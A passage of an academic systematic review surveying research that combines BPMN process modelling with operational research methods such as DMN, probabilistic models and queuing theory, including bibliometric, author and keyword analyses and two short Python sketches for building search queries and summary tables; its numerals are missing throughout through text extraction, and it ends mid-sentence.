business process modelling notation was created by the business process management initiative (bpmi) as an open standard. it is very similar to flowcharts and petri nets but offers much more sophisticated tools to describe and simulate behaviour. silver ( ) stated that this approach is an 'event-triggered behaviour', a description of the 'something happened' mode. business process modelling is used to describe, recognize, re-engineer, or improve processes or practices (tomaskova, ). business process model and notation (bpmn) is the language that is used to model business process steps from start to end. the notation was explicitly designed for wide-ranging use in process analysis (the object management group, ). bpmn is both intelligible to non-specialists and allows complicated processes between different participants to be represented. another very significant feature of bpmn is its 'business-friendly' orientation, which is essential for the company's business and knowledge. operational research (or) is concerned with formulating, modelling, and solving a variety of decision-making situations to find optimal solutions. the company's philosophy and decisions over business data are the most crucial management concerns.
the task of the manager is to select, in the real system, the problem to be analyzed and to formulate it precisely. the standard way of doing this involves expressing an economic model and then formulating a mathematical model. it is necessary to build a simplified model of the real financial system that includes only the essential elements describing the formulated problem. the manager has to set the goal of the analysis and the subsequent optimization. it is important to define all operations and processes that influence this goal, to describe all the factors, and to verbally express the relationships between the stated goal and the mentioned processes and factors.

the article is divided into the following parts. the "related works and background" section lists research articles that are relevant to the given combination of the bpmn and or areas, and briefly provides essential information regarding the approaches that are fundamental to this systematic review. the "research methodology" section describes the systematic search, i.e., the entry conditions, exclusion criteria and limitations. the "results" section presents the results of the analysis of the articles fulfilling the requirements of the systematic review. we analyzed the publications according to when they were published, their citations, the scientific areas covered, the cooperation of the authors and their keywords. subsequently, we examined the selected articles in terms of methodology, approach and research areas. in the "discussion", we focus on scientific gaps and future research. we present a research area where we expect an increase in publications, including their specific components. we also discuss the future development of applied methods and approaches. finally, the "conclusion" section summarizes the results and benefits of this study.

related works and background
the background information and related works are listed in the paragraphs below. we first focus on process modelling and bpmn, and then on or and its essential methods and approaches. organizational processes and decision support can be captured in many ways and for many areas; we can mention, for example: strategic management (maltz & kohli, ; certo, ; tomaskova, ; maresova, ; tsakalidis et al., ); product development research and innovation implementation (repenning, ; garcia, ); it and economic analyses (shane & cable, ; dedrick, gurbaxani & kraemer, ; krenek et al., ; tomaskova, kuhnova & kuca, ; maresova, tomaskova & kuca, ; tomaskova et al., ; maresova, sobeslav & krejcar, ; cheng et al., ; tomaskova, kopecky & maresova, ; tomaskova et al., ; kopecky & tomaskova, ; kopecky & tomaskova, ); different simulation approaches and analyses (sterman, ; kozlowski et al., ; cimler et al., ); and non-standard optimization techniques (gavalec & tomaskova, ; bacovsky, gavalec & tomaskova, ; tomaskova & gavalec, , ; gavalec, plavka & tomaskova, ; gavalec, mls & tomaskova, ; cimler et al., ; oudah, jabeen & dixon, ). some authors have attempted to provide a solution for process model analysis. for example, melao & pidd ( ) discussed the strengths and limitations of the various modelling approaches used in business process transformation. the article by glassey ( ) compares three process modelling approaches used in case studies.
the article by sadiq & orlowska ( ) analyzes process models using graph reduction techniques. other authors, such as van der aalst et al. ( ) and krogstie, sindre & jorgensen ( ), use specific tools, frameworks and methods for process analysis and modelling.

business process modelling
today, process modelling and business process management (bpm) have a significant impact. process modelling is currently a mainly graphical representation of processes, e.g., in what order particular activities should be implemented and what inputs and outputs the processes require for proper functioning. the primary goal of process modelling is to increase the efficiency and effectiveness of the entire process as well as of its partial activities. many business process modelling techniques have been proposed over the last decades, so the article by recker et al. ( ) comparatively assesses representational analyses of popular process modelling techniques to provide insights into the extent to which they differ from each other. a review of the business process modelling literature and a description of the leading process modelling techniques falling to and before are published in the article by aguilar-saven ( ). the topic of visualization of business process models has been investigated in dani, freitas & thom ( ), where the authors performed a systematic literature review of the topic "visualization of business process models". kalogirou ( ) is a particularly fascinating article that illustrates how ai techniques might play an essential role in the modelling and prediction of the performance and control of the combustion process. although bpm initially focused mainly on the
operational reserach operational research (or) is the well-known approach of using analytical and advanced methods to help make the best possible decisions. as early as , article by authors shannon, long & buckles ( ) presented the results of a survey of the perception of the usefulness and knowledge of the or methodologies commonly used in the practice of industrial engineering. the article by dubey ( ) defines the relationship between or and another branch of sciences. the article gu, goetschalckx & mcginnis ( ) presents a detailed survey of the research on warehouse design, performance evaluation, practical case studies, and computational support tools. the article negahban & smith ( ) provided a review of discrete event simulation publications with a particular focus on applications in manufacturing. or methods are often associated with new technologies. in article sarac, absi & dauzère-pérès ( ), a state-of-the-art on rfid technology deployments in supply chains was given to analyze the impact on the supply chain performance. xu, wang & newman ( ), in their article, tries to identify future trends of computer-aided process planning (capp). dynamic ride-share systems is investigated in the article agatz et al. ( ). linear programming one of the most popular areas of or in practice is linear programming (lp). the mathematical model of linear programming tasks contains a single linear purpose tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ function, and the actual constraints of the problem are described only by linear equations and inequalities. these tasks are most often encountered in economic practices. linear programming has been described in several books: dantzig ( ), schrijver ( ), dorfman, samuelson & solow ( ). multicriterial decision making the solving of multi-criteria decision-making (mcdm) tasks comprises the search for optimal values of the unknowns, which are simultaneously assessed according to several often contradictory criteria. thus, the mathematical model of multi-criteria decision problems contains several purpose functions. depending on how the sets of decision variants are defined, we are talking about the tasks of multi-criteria linear programming or multi-criteria evaluation of options. a review of applications of analytic hierarchy process in operational management is inverstigated in subramanian & ramanathan ( ). the article velasquez & hester ( ) performs a literature review of common multi-criteria decision making methods. the authors present the results of a bibliometric-based survey on ahp and topsis techniques in publication zyoud & fuchs-hanusch ( ). project planning project management tasks consist of several separate activities that are interdependent and may be run simultaneously. the most commonly used method is the so-called network analysis, where a network graph is created from the left chronologically arranged project activities representing the project life cycle. the longest possible path from the beginning to the end of the project is recorded by “the critical path”. the non-observance of this path will lead to a slowing down of the whole project, whose time duration is to be optimized. the optimistic, pessimistic, and most probable estimate of the implementation of the entire project is determined. the article nutt ( ) relates the project planning process and implementation. 
critical path method (cpm) is found in the article jaafari ( ), to be equally useful as a planning tool for linear or repetitive projects. the resource-constrained project scheduling problem (rcpsp) is a general problem in scheduling. the article pellerin, perrier & berthaut ( ) examines the general tendency of moving from pure metaheuristic methods to solving the rcpsp to hybrid methods that rely on different metaheuristic strategies (cimr, cimler & tomaskova, ). nonlinear programming nonlinear programming is the case when the purpose function is not linear. tasks then often have a large number of local extremes and often also have great difficulty finding them. dynamic programming if constraints are functions of some parameter, which is most often time, we are talking about dynamic programming. this approach deals with the modelling of more complex multi-stage optimization problems divisible into related sub-problems. depending on the time parameter, the system is always in one of the acceptable states during the process. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at certain times it is necessary to choose from a set of possible decisions, which again results in the transition to the next state. we call the strategy a sequence of these states of the system and choices, looking for the course with the best valuation. simulations are often used to model and analyze the operation of complex systems without realization and in less than real-time. � queuing theory is a type of dynamic programming task. it deals with streamlining the functioning of systems in which it is necessary to gradually serve all units whose requirements are continuously met on so-called service lines. the challenge is to find the most effective way to handle these requirements. � inventory management models address the issue of optimizing the supply process and the volume of inventory stored. costs associated with ordering, issuing, and keeping stocks in stock should be minimized. stochastic programming stochastic programming deals with optimization problems in which they act as parameters of their constraints of random variables. probabilistic calculus methods solve these problems, and their results have the character of random variables. stochastic processes can also be ranked among tasks with the input data uncertainties. this approach is used to describe the behavior of systems evolving. we are talking about stochastic processes, a special case is the so-called markov chains and markov processes. basic books on this topic are, for example: kall, wallace & kall ( ), birge & louveaux ( ), shapiro, dentcheva & ruszczy�nski ( ). research methodology kitchenham & charters ( ) highlighted three essential elements for a systematic literary review: the determination of the research question(s), the organisation of an unbiased and extensive analysis of related publications, and the determination of precise criteria of inclusion and exclusion. we identified three research questions: � research question (r ): greater adaptability of bpmn elements causes greater application of this notation in publications. � research question (r ): the connection between bpmn and or methods is most often applied to the business and economics areas. � research question (r ): the queue theory is the most widely used method in bpmn processes. the analysis process and criteria are given in the following relevant subsections. 
eligibility criteria
this study included publications listed in the web of science (wos) database of clarivate analytics that were published between january and may . the year was selected as this is when bpmn was created by bpmi. the exclusion criteria (ec) are:
• ec = the publication was published in a language other than english.
• ec = the full text of the publication was not available.
• ec = the publication did not coincide with the topic of the systematic research.
• ec = bpmn was used only as a presentation tool and not as part of the research.
information sources and search
the primary source of information for the study was the web of science (wos) database of clarivate analytics. an advanced search was performed for the search queries mentioned below. the search was performed in the topics (ts) section. specifically, the core collection with the indexes listed in table was selected. the search was performed for 'all document types,' 'all languages' and the years – .
study selection
the first step of the review process involved title and abstract screening, followed by a full-text review of the remaining articles. two independent assessors verified the results of the title and abstract screening and the full-text review. one assessed the suitability of the results from the perspective of or and the other from an it perspective, i.e. whether bpmn notation was actually used. articles were included if they met all of the following criteria: (i) they used an or method, (ii) a bpmn model was used, and (iii) the complete text was available in english (abstracts, commentaries, letters and unpublished data were excluded). studies were not excluded based on their methodological quality. the selected publications were examined from many perspectives, and each contribution was coded according to different criteria. this study aimed to enhance the discipline's fundamental progress in understanding the link between or methods and bpmn. the results of this study could encourage scientists to use or methods for process analysis.
table web of science core collection indexes:
• science citation index expanded (sci-expanded)
• social sciences citation index (ssci)
• arts & humanities citation index (a&hci)
• conference proceedings citation index—science (cpci-s)
• conference proceedings citation index—social science & humanities (cpci-ssh)
• book citation index—science (bkci-s)
• book citation index—social sciences & humanities (bkci-ssh)
• emerging sources citation index (esci)
• current chemical reactions (ccr-expanded)
• index chemicus (ic)
a limitation of this review was restricting the included articles to english-language publications that looked at process analysis using or and bpmn, published between january and may . relevant studies in other languages or published after may may have been omitted.
data collection process
data was collected based on keywords selected from the article lane, mansour & harpell ( ), which analyzed the quantitative techniques of operations research. from this document, the operations research methods were selected and listed in the table . the results were further categorized as to whether they corresponded to the given keywords and their meaning.
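as an illustration of this data collection step, the ts= search strings listed in the table in the following subsection pair each or keyword with 'bpmn'. the short python sketch below shows how such query strings can be assembled from a keyword list; the keyword list is a partial, hypothetical excerpt and the helper function is illustrative only, not part of the study's actual tooling.

# hypothetical sketch: build wos advanced-search strings of the form
# ts=(<keyword terms> and bpmn) from a list of or keywords
or_keywords = [
    "linear programming",
    "dynamic programming",
    "queuing",
    "stochastic processes",
]

def wos_query(keyword, anchor="bpmn"):
    # split multi-word keywords so that every term is combined with 'and'
    terms = keyword.split() + [anchor]
    return "ts=(" + " and ".join(terms) + ")"

for kw in or_keywords:
    print(wos_query(kw))
# ts=(linear and programming and bpmn)
# ts=(dynamic and programming and bpmn)
# ts=(queuing and bpmn)
# ts=(stochastic and processes and bpmn)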
the main results of the systematic literature review were obtained by following the two main guidelines of prisma, moher et al. ( ), and mecir, higgins et al. ( ).
synthesis of results
the individual studies were subjected to bibliometric analysis, and the studies were then assessed according to the content and methods used. bibliometric analysis describes and analyses up-to-date research. it aims at summarizing the latest progress in the field by quantitatively investigating the literature. this method provides a vast canvas of knowledge from the micro-level (institutes, researchers, and campuses) to the macro-level (countries and continents) mryglod et al. ( ). frequency analysis was used to find the most common scientific areas, the countries with the most publications and the most common keywords. science mapping was performed using the vos viewer, venn diagrams and bar and bubble graphs, van eck et al. ( ), cobo et al. ( ).
table electronic search strategy in wos (queries and their numbers of results):
• ts=(computer and programming and bpmn)
• ts=(decision and analysis and bpmn)
• ts=(decision and theory and bpmn)
• ts=(dynamic and programming and bpmn)
• ts=(heuristic and programming and bpmn)
• ts=(hypothesis and testing and bpmn)
• ts=(inventory and control and bpmn)
• ts=(linear and regression and bpmn)
• ts=(linear and programming and bpmn)
• ts=(math and analysis and bpmn)
• ts=(math and programming and bpmn)
• ts=(network and analysis and bpmn)
• ts=(nonlinear and programming and bpmn)
• ts=(pert and bpmn)
• ts=(probability and bpmn)
• ts=(queuing and bpmn)
• ts=(statistic and bpmn)
• ts=(stochastic and processes and bpmn)
the venn/euler diagram graphically represents the relationships of the largest sets of keywords. euler diagrams are considered to be an effective means of visualizing containment, intersection, and exclusion. the goal of this type of graph is to communicate scientific results visually. leonhard euler first popularized the principle of labelled closed curves in the article euler ( ); alternative names for euler diagrams include 'euler circles.' they are also, incorrectly, called venn diagrams. venn diagrams require all possible curve intersections to be present, so they can be seen as a subset of euler diagrams; that is, every venn diagram is an euler diagram, but not every euler diagram is a venn diagram. john venn introduced venn diagrams a hundred years after euler in the article venn ( ). a venn diagram is a schematic graph used in logic theory to depict collections of sets and represent their relationships.
results
the initial search resulted in articles. after removing duplicates, were left that underwent title and abstract screening. after screening, articles remained that underwent full-text review. the final number of included articles for information abstraction was . an overview of the number of publications according to the exclusion criteria is shown in fig. . eighteen keywords selected from the article by lane, mansour & harpell ( ) were involved in the study. these keywords were classified according to whether a publication meeting the study conditions was found for them. a suitable publication was found for only of the keywords, as can be seen in table .
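the per-area summaries reported in the following subsection (document counts, average citations and average page numbers) can be reproduced with a simple group-by computation. the sketch below assumes the pandas library is available and uses purely hypothetical placeholder records, not the study's data.

# hypothetical sketch of the frequency analysis behind the bar graph:
# documents per research area, average citations and average page counts
import pandas as pd

# placeholder records; each row stands for one included publication
docs = pd.DataFrame([
    {"area": "computer science",     "citations": 4,  "pages": 12},
    {"area": "computer science",     "citations": 1,  "pages": 9},
    {"area": "engineering",          "citations": 6,  "pages": 14},
    {"area": "operational research", "citations": 11, "pages": 18},
    {"area": "business economics",   "citations": 8,  "pages": 22},
])

summary = (docs.groupby("area")
               .agg(documents=("citations", "size"),
                    avg_citations=("citations", "mean"),
                    avg_pages=("pages", "mean"))
               .reset_index())
print(summary)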
categorization of publications based on the clarivate analytics
journals and books covered by the web of science core collection were assigned to at least one web of science category. each web of science category was mapped to one research area (clarivate analytics, ).
figure overview of the systematic review.
the research areas for the selected publications were:
• computer science (cs)
• engineering (en)
• operational research management science (or)
• business economics (be)
• robotics (ro)
• automation control systems (acs)
• telecommunications (te)
• transportation (tr)
we selected four main groups, for which we compiled a bar graph and a venn diagram after the analysis. we chose four research areas for representation in the venn diagram because four sets are still easy to arrange clearly. another argument was the number of publications in the remaining areas: the set 'robotics' contains two documents, and the sets 'automation control systems,' 'telecommunications' and 'transportation' each contain one document. the bar graph in fig. is based on frequency analysis and contains the total number of publications in a given research area, their average number of citations, and the corresponding average number of pages per article. the graph shows the results by type of indicator: the first part shows the frequency of documents for each research area, the second part focuses on the average number of citations, and the third shows the average number of pages per article.
figure research areas of selected publications, documents, average citations and average pages.
the venn diagram in fig. shows the four selected research areas as sets, including their intersection areas. for each specific area, we also state the relevant number of documents and their average number of citations. this part of the bibliometric analysis gave us the answer to research question r . although bpmn was explicitly designed for corporate and economic analysis, and operational research focuses primarily on addressing managerial decisions, most publications were not in the field of business economics (be). surprisingly, this area actually has the fewest publications. the field of computer science had the most papers, and papers in the field of or had the most citations. the field of be, however, had the longest publications, i.e. the highest average number of pages per paper. result : research question r —not confirmed.
year of publication
figure illustrates the distribution over time of the selected publications together with bpmn milestones. the adoption dates of the bpmn versions, taken from omg.org ( ), complement this figure. the different bpmn versions brought more or fewer changes to the notation. the changes between bpmn . and bpmn . were rather cosmetic, e.g. renaming 'rule' elements to 'conditional' or slightly increasing the number of elements from to . the arrival of bpmn . , in contrast, was a major breakthrough and represented the largest revision of bpmn since its inception. in this version, it is possible to create a new 'choreography model,' 'collaborations model' and 'conversation model' in bpmn in addition to collaborative processes and internal (private) business processes.
events are now divided into ‘interrupted’ and ‘non-interrupted’ and ‘catching’ and ‘throwing.’ the message type is figure venn diagram of research areas of selected publications, the average number of citations is listed in the parentheses. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ newly introduced, and the data object has three specifications. bpmn . contains elements. bpmn . . included only minor modifications in terms of typos. given the magnitude of changes between the different versions of the bpmn notation, the sharp increase in publications following the introduction of the bpmn . notation can be considered a confirmation of research question r . it is very interesting that publications in the field of be did not appear until . result: research question r —confirmed. the average number of citations of the analysed documents was . . the first quartile was , and the third quartile was . . the median was equal to and data variability above the third quartile was limited to seven citations. we identified two outliers values: citations for hasic, de smedt & vanthienen ( ) and citations for article wu et al. ( ). author analyses bibliometric analysis cannot be done without review by the authors. we focused on illustrating co-authorship. the total number of authors of publications selected for this study was : al achhab, m ( ), aouina, zk ( ), ayani, r ( ), aysolmaz, b ( ), bahaweres, rb ( ), batoulis, k ( ), ben ayed, ne ( ), ben said, l ( ), ben-abdallah, h ( ), bisogno, s ( ), bocciarelli, p ( ), boukadi, k ( ), braghetto, kr ( ), burattin, a ( ), calabrese, a ( ), ceballos, hg ( ), chien, cf ( ), cho, sy ( ), creese, s ( ), cunha, p ( ), d’ambrogio, a ( ), d’ambrogio, sa ( ), de lara, j ( ), de smedt, j ( ), demirors, o ( ), duran, f ( ), el hichami, o ( ), el mohajir, b ( ), ferreira, je ( ), figl, k ( ), fitriyah, a ( ), flores-solorio, v ( ), fookes, c ( ), garcia-vazquez, jp ( ), ghiron, nl ( ), ghlala, r ( ), gomez-martinez, e ( ), hansen, z ( ), hansen, znl ( ), happa, j ( ), hasic, f ( ), herbert, lt ( ), holm, g ( ), iren, d ( ), jacobsen, p ( ), jobczyk, k ( ), kamrani, f ( ), khlif, w ( ), kluza, k ( ), ligeza, a ( ), manuel vara, j ( ), marcos, e ( ), mazhar, s ( ), mendling, j ( ), mendoza morales, le ( ), mengersen, k ( ), monsalve, c ( ), moradi, f ( ), naoum, m ( ), onggo, bss ( ), pablo garcia, j ( ), figure distribution of the publications by year and their representation in research areas. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ perez-blanco, f ( ), pitchforth, j ( ), proudlove, nc ( ), rekik, m ( ), rocha, c ( ), rosemann, m ( ), rozy, nf ( ), salaun, g ( ), sharp, r ( ), sperduti, a ( ), suchenia, a ( ), tang, rz ( ), tokdemir, g ( ), tomaskova, h ( ), vanden broucke, sklm ( ), vanthienen, j ( ), veluscek, m ( ), villavicencio, m ( ), vincent, jm ( ), weske, m ( ), wisniewski, p ( ), wu, ppy ( ), xie, y ( ). these authors formed different sized groups, as can be seen in fig. . we grouped the authors according to their co-authors’ collaborations with a curve connecting the co-authors. the size of the node of this connection corresponds to the number of documents by the given author. 
the colours used to distinguish the authors were created using the average years of the publication of their papers. for the authors’ average publication years, the first quartile was , the third quartile was . and the median was . the variability outside the lower and upper quartiles figure division of authors into groups according to co-authorship. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ was given by and . we identified one outlier value corresponding to the year . the most prominent groups were around the authors listed in fig. . this figure also contains the number of documents by the authors, their total number of citations and their average value. according to this analysis wu, p. y. had the highest number of citations ( . ), followed by de smedt, j. ( ) and hasic, f. ( ). herbert, l.t. had the most documents ( ) and tomaskova, h. had no co-author connections. the authors were also analyzed in terms of their country or region affiliations. a total of countries were identified and their location, including the number of relevant publications, are shown in fig. . the countries with the highest number of affiliated publications were denmark ( ) and tunisia ( ), followed by belgium, france, saudi arabia, italy and spain, who all had three. keywords analysis the keywords were categorized according to those identified by the published authors and the keywords plus assigned by clarivate analytics databases. the data in keywords plus are words or phrases that frequently appear in the titles of an article’s references but do not appear in the title of the item itself. based upon a special algorithm that is unique to clarivate analytics databases, keywords plus enhances the power of cited- reference searching by searching across disciplines for all the articles that have cited references in common, more information is on the web link clarivate analytics ( ). a total of unique keywords and unique keywords plus keywords were found for selected publications. a total of author keywords were mentioned in the publications and a general view of their interconnection can be seen in fig. . below is a list of all author keywords with the number of the weight-link to other keywords: activity theory ( ), affiliation ( ), agent based model ( ), agent-based systems engineering ( ), airport passenger facilitation ( ), atl ( ), automated verification ( ), figure fifteen most successful authors. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ bayesian network ( ), bayesian networks ( ), bpm ( ), bpmn ( ), bpmn business processes ( ), bpmn extension ( ), bpmn model restructuring ( ), business process ( ), business process automation ( ), business process management ( ), business process model ( ), business process model measures ( ), business process modelling notation ( ), business process optimisation ( ), business process outsourcing ( ), business processes ( ), cloud computing ( ), clustering ( ), communication theory ( ), configurable reference model ( ), consequence modelling and management ( ), contextual factors ( ), cycle time ( ), decision making ( ), decision mining ( ), decision model and notation ( ), decision modeling ( ), decision modelling ( ), dikw ( ), discrete-event simulation ( ), dmn ( ), effort prediction model ( ), engineering agent-based systems ( ), engineering systems ( ), enterprise risk management ( ), eqn ( ), evolutionary algorithm ( ), evolutionary algorithms ( ), facilitated modelling ( ), fault tree analysis ( ), fault tree generation ( ), flow ( ), formal risk analysis ( ), genetic algorithm ( ), healthcare ( ), hierarchical clustering ( ), incident response ( ), integrated modelling ( ), interviews ( ), jeqn ( ), knowledge discovery ( ), knowledge management ( ), knowledge rediscovery ( ), licenses ( ), maude ( ), mc-dmn ( ), mcdm ( ), mda ( ), metrics ( ), model checking ( ), model transformations ( ), model-driven architecture ( ), model-driven engineering ( ), modelling ( ), object modeling ( ), optimisation ( ), organizational mining ( ), performance ( ), performance evaluation ( ), petri nets ( ), pproduction optimisation ( ), preference to criteria ( ), prism ( ), probability ( ), process configuration ( ), process enhancement ( ), process chain network ( ), process merging ( ), process mining ( ), process modeling ( ), process modelling ( ), project management ( ), qualitative analysis ( ), quantitative model checking ( ), quantitative service analysis ( ), figure location of publications in the world, own processing. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ quantitative workflow analysis ( ), queues ( ), queuing theory ( ), reliability analysis and risk assessment methods ( ), resource allocation ( ), restructuring ( ), rewriting logic ( ), rules ( ), safety assessment software tools ( ), safety management and decision making ( ), security ( ), security operation center ( ), sense-making ( ), separation of concerns ( ), service engineering ( ), scheduling ( ), simulation ( ), simulations ( ), social network ( ), social network analysis ( ), social network model ( ), socio-technical systems (sts) ( ), soundness ( ), space-sensitive process model ( ), statistical model checking ( ), stocastic bpmn ( ), stochastic automata network ( ), stochastic bpmn ( ), stochastic model checking ( ), stochastic modeling and analysis ( ), structural and semantic aspects ( ), tacit knowledge ( ), task analysis ( ), task assignment ( ), task model ( ), timed automata ( ), topsis ( ), verification ( ). as you can see in the figure, most of the author’s keywords are directly or indirectly linked with the term ‘bpmn’, but there are also isolated groups. in the following text, figure co-ocurence of author keywords. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. 
/ http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we’ve listed separate keyword groups. we’ve added a year of publication, a number of citations, and a specific document to which the keywords belong. � ; citations; (business process automation; business process model measures; effort prediction model; project management) aysolmaz, iren & demirors ( ). � ; citation; (evolutionary algorithm; pproduction optimisation; stocastic bpmn) herbert et al. ( ), � ; citations; (agent based model; bayesian network; business process modelling notation; modelling; socio-technical systems (sts)) wu et al. ( ), � ; citation; (affiliation; bpm; hierarchical clustering; knowledge discovery; knowledge rediscovery; restructuring; social network model) khlif & ben-abdallah ( ), � ; citations; (bpmn extension; business process outsourcing; cloud computing; genetic algorithm) rekik, boukadi & ben-abdallah ( ). � ; citations; (bpmn model restructuring; clustering; metrics; rules; social network; structural and semantic aspects) khlif, ben-abdallah & ben ayed ( ). � ; citations; (atl; business process model; model transformations; model-driven engineering; petri nets; process chain network) gómez-martnez et al. ( ). as mentioned above, there were only keywords plus keywords (the number of links to other keywords is given in parentheses after the keyword): accuracy ( ), ambiguity ( ), automation ( ), bpmn ( ), business process models ( ), checking ( ), cognitive effectiveness ( ), communities ( ), complex ( ), confidence ( ), context ( ), critical path ( ), decision-making ( ), design ( ), dimensions ( ), distributed simulation ( ), framework ( ), functional size ( ), group creativity ( ), identification ( ), figure co-ocurence of keywordsplus. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ implementation ( ), information ( ), integration ( ), model ( ), neural-network ( ), organizational knowledge ( ), patterns ( ), performance ( ), process execution ( ), process models ( ), productivity ( ), quality ( ), reality ( ), reference models ( ), resources ( ), risk ( ), science research ( ), semantics ( ), sensemaking ( ), simulation ( ), strategy ( ), systems ( ), tables ( ), verification ( ), web ( ), workflow ( ). as can be seen in fig. , these keywords are far more separate from each other compared to the author’s keywords. classification of articles by methodology based on the expert assessment, we examined the documents regarding the methods and approaches used. we created seven groups corresponding to a method or approach that was an essential part of the publication: probabilistic models, decision model and notation (dmn), dynamic task assignment problem, evolutionary and genetics algorithms, queuing theory, social networks and others. these groups were also based on keyword analysis, as some separate groups of copyright keywords belong to highly unique articles. we assigned each document to just one group. that is in contradiction to research areas, where one article can be attributed to more than one research area. the individual documents and their division between research areas and methodological groups can be seen in table . we further analyzed the documents regarding their years of publication and plotted a bubble graph (fig. 
) with the publication years on the x.axis and the methodological groups on the y-axis. the appropriate number of publications corresponding to the given year and the group is indicated in the respective bubble. this quantity is also graphically represented by the size of the given bubble. the largest group consisted of publications on dmn and bpmn. given the initiate year of dmn, this is the most significant approach serving with bpmn. dmn . was made available to the public in september , the omg group released dmn . in june , dmn . was released in january and the latest version of dmn . was released in march . the latest version did not affect this systematic search; however, the growth of publications since (see fig. , for example, was undoubtedly be affected by the dmn update. we only assigned four documents to the methodological group focused on queue theory (see table and fig. ). the specific articles are listed in the following section under the appropriate heading. as the largest group was the dmn and bpmn group, we can thus rule out research question r . result: research question r —not confirmed. the methods, techniques and approaches used in the included publications are listed in the following section. probabilistic models the probabilistic model can be used to make decisions when the activity reaches an exclusive splitting gateway and the activity’s subject must decide between alternative tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ actions. they can be used for predicting or deciding between alternative works based on desirable outcomes. probabilistic models were presented in the following publications: � herbert & sharp ( ): quantitative analysis of probabilistic bpmn workflows; � herbert & sharp ( ): precise quantitative analysis of probabilistic business process model and notation workflows; � ceballos, flores-solorio & garcia-vazquez ( ): towards probabilistic decision making on human activities modeled with business process diagrams; � ceballos, flores-solorio & pablo garcia ( ): a probabilistic bpmn normal form to model and advise human activities; � naoum et al. ( ): a probabilistic method for business process verification: reachability, liveness and deadlock detection, there the (causal) bayesian network or markov decision processes were used. table documents division according to the research areas and methodological groups. indexes abbreviation science citation index expanded (sci-expanded) social sciences citation index (ssci) computer science ( ) engineering ( ) operational research ( ) business economics ( ) probabilistic models ( ) herbert & sharp ( , ), ceballos, flores- solorio & garcia-vazquez ( ), ceballos, flores-solorio & pablo garcia ( ), naoum et al. ( ) herbert & sharp ( ), herbert & sharp ( ), ceballos, flores- solorio & garcia-vazquez ( ) dmn ( ) batoulis & weske ( ), ghlala, aouina & ben said ( ), hasic, de smedt & vanthienen ( ), de smedt et al. ( ), durán, rocha & salaün ( ), suchenia et al. ( ), cho, happa & creese ( ) figl et al. ( ), suchenia et al. ( ), cho, happa & creese ( ) batoulis & weske ( ), hasic, de smedt & vanthienen ( batoulis & weske ( ), tomaskova ( ), mazhar, wu & rosemann ( ) dynamic task assignment problem ( ) xie, chien & tang ( ) xie, chien & tang ( ) evolutionary and genetic algorithms ( ) herbert & sharp ( b), rekik, boukadi & ben-abdallah ( ) herbert & sharp ( b), herbert et al. 
( ), herbert, hansen & jacobsen ( ), herbert & hansen ( ) herbert & hansen ( ) queuing theory ( ) bocciarelli & d’ambrogio ( ), bahaweres, fitriyah & rozy ( ), gómez-martnez et al. ( ) bocciarelli & d’ambrogio ( ) onggo et al. ( ) onggo et al. ( ) social network ( ) khlif & ben-abdallah ( ) khlif, ben-abdallah & ben ayed ( ) other ( ) kamrani et al. ( ), braghetto, ferreira & vincent ( ), aysolmaz, iren & demirors ( ), burattin, sperduti & veluscek ( ), wu et al. ( ), mendoza morales, monsalve & villavicencio ( ), duran, rocha & salaun ( ) kamrani et al. ( ), burattin, sperduti & veluscek ( ), herbert & sharp ( a), herbert, hansen & jacobsen ( ) kamrani et al. ( ), wu et al. ( ) tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dmn and decision analysis decision model and notation (dmn) is an industry standard for modeling and executing decisions that are determined by business rules. the association of dmn and bpmn is now common practice: � batoulis & weske ( ): soundness of decision-aware business processes, � de smedt et al. ( ): holistic discovery of decision models from process execution data, � durán, rocha & salaün ( ): a rewriting logic approach to resource allocation analysis in business process models, � figl et al. ( ): what we know and what we do not know about dmn, � ghlala, aouina & ben said ( ): mc-dmn: meeting mcdm with dmn involving multi-criteria decision-making in business process � hasic, de smedt & vanthienen ( ): augmenting processes with decision intelligence: principles for integrated modelling � cho, happa & creese ( ): capturing tacit knowledge in security operation centers, � mazhar, wu & rosemann ( ): designing complex socio-technical process systems - the airport example, � suchenia et al. ( ): towards knowledge interoperability between the uml, dmn, bpmn and cmmn models � tomaskova ( ): modeling business processes for decision-making. both standards fall under omg. dynamic task assignment approach the study : a dynamic task assignment approach based on individual worklists for minimizing the cycle time of business processes by xie, chien & tang ( ) develop a figure buble graph—quantity of article according to methodological groups and publication year. full-size doi: . /peerj-cs. /fig- tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ dynamic task assignment approach for minimizing the cycle time of business processes. the contribution of this article lies in developing 